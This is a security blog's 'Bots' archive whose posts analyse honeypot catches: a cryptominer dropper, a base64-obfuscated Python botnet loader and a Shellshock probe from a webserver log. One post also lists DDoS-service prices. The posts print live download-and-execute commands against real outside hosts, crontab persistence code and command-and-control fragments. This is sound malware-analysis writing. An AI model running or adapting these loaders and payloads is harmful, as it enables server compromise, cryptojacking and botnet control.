Archive for the ‘Bots’ Category

sumokoin – cryptonight

Tuesday, February 27th, 2018

Another honeypot entry caught my eye. First, the attack
itself was unusual because the malware download was executed
by a small Python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ `getconf LONG_BIT` -eq 64 ]
then u="http://www.bizqsoft.com/tp2/r6.log"
else u="http://www.bizqsoft.com/tp2/r.log"
fi
wget -O /tmp/run
curl -o /tmp/run
python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')"

Looking into the downloaded binary one finds this miner for
the cryptocoin "sumokoin" using the "cryptonight" algorithm:

{"algo":"cryptonight","av":0,"background":false,"colors":true,
 "cpu-affinity":null,"cpu-priority":null,"donate-level":5,"log-file":null,
 "max-cpu-usage":75,"print-time":60,"retries":5,"retry-pause":5,"safe":false,
 "syslog":false,"threads":null,
 "pools":[
   {"url":"pool.sumokoin.hashvault.pro:80",
    "user":"Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon",
    "pass":"x86_64","keepalive":true,"nicehash":false},
   {"url":"pool.sumokoin.com:3333",
    "user":"Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon",
    "pass":"x86_64","keepalive":true,"nicehash":false},
 ],
 "api":{"port":0,"access-token":null,"worker-id":null}}

(see https://coinmarketcap.com/currencies/sumokoin/ )

Looking into the blockchain explorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..
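As an added example (not code from this post, and not the miner's own code), a small carver of the kind one writes when triaging such a sample: it pulls embedded pool configuration out of a binary blob and tolerates the trailing comma in the pools list above, which makes a strict JSON parser reject the config. The sample bytes, pool host and wallet below are constructed placeholders.

```python
import json
import re
# Constructed sample: a fake "binary" with junk around an embedded miner config
# shaped like the one in the honeypot sample; pool host and wallet are placeholders.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 16 + b"junk{not json}junk"
    + b'{"algo":"cryptonight","donate-level":5,"threads":null,'
      b'"pools":[{"url":"pool.example.invalid:3333","user":"WALLET_PLACEHOLDER",'
      b'"pass":"x86_64","keepalive":true,"nicehash":false},],'
      b'"api":{"port":0,"access-token":null}}'
    + b"\x00" * 8 + b"trailing strings"
)

TRAILING_COMMA = re.compile(r",\s*([\]}])")

def carve_json_objects(blob: bytes):
    """Yield every brace-balanced {...} span in the blob (braces inside strings are not special-cased)."""
    depth, start = 0, None
    for i, byte in enumerate(blob):
        if byte == 0x7B:              # '{'
            if depth == 0:
                start = i
            depth += 1
        elif byte == 0x7D and depth:  # '}'
            depth -= 1
            if depth == 0:
                yield blob[start:i + 1]

def parse_lenient(span: bytes):
    """Parse JSON; on failure retry with the trailing commas stripped that
    embedded miner configs often carry and that strict parsers reject."""
    text = span.decode("utf-8", errors="replace")
    for candidate in (text, TRAILING_COMMA.sub(r"\1", text)):
        try:
            return json.loads(candidate)
        except ValueError:
            continue
    return None

def extract_miner_configs(blob: bytes):
    """Return [(algo, [(pool_url, wallet), ...])] for each config that has pools."""
    found = []
    for span in carve_json_objects(blob):
        cfg = parse_lenient(span)
        if isinstance(cfg, dict) and isinstance(cfg.get("pools"), list):
            pools = [(p.get("url"), p.get("user"))
                     for p in cfg["pools"] if isinstance(p, dict)]
            found.append((cfg.get("algo"), pools))
    return found
```

Run over a real sample, the returned pool host and wallet are the indicators worth blocking and reporting to the pool operator.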

Linux Botnet

Wednesday, January 10th, 2018

Another nice SSH honeypot catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgICAgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYWdlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

The base64 blob decodes to a tiny loop that downloads a base64-encoded complete Python program from http://k.zsw8.cc/Api/, exec()s it and retries every 300 seconds.

In that program a crontab entry is made:

    if runCodePath not in crontabData:
        f = open("/etc/crontab", "a+")
        f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it uploads data about the hacked server to the herder:

    my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
    f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

    if data.has_key("download") and data["download"]:
        DownExec(data["download"], task_id)
    if data.has_key("cmd") and data["cmd"]:
        CmdExec(data["cmd"], task_id)

I wonder what would happen if the computer name were a BeEF XSS hook or something..?

recently in the webserver log ..

Monday, August 17th, 2015

While strolling through the webserver logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl opens an IRC connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to Shellshock ..

DDoS – cheaper than I thought..

Monday, September 29th, 2014

Recently I stumbled upon an advertisement for a DDoS attack service in the Tor network; it was way cheaper than I thought.

25 minutes of 150 Gbps costs only $15; a silver package for 1 hour is available for $20 and a whole week with an hour per day of downtime can be bought as a gold package for only $60. These darknets are really dark these days…

bitbucket decrypt bitcrypt

Friday, February 21st, 2014

The evil bitcrypt malware, which encrypts files on hijacked PCs and offers the decryption key for a payment of 260 €, has a serious flaw in its encryption design, Heise reported.

Fabien Perigaud and Cedric Pernet from bitbucket.org managed to find out that the RSA key used had a length of 128 decimal digits instead of 128 bytes, so they were able to crack the 426-bit key in 43 hours.

The free Python script is available here. Cool stuff 🙂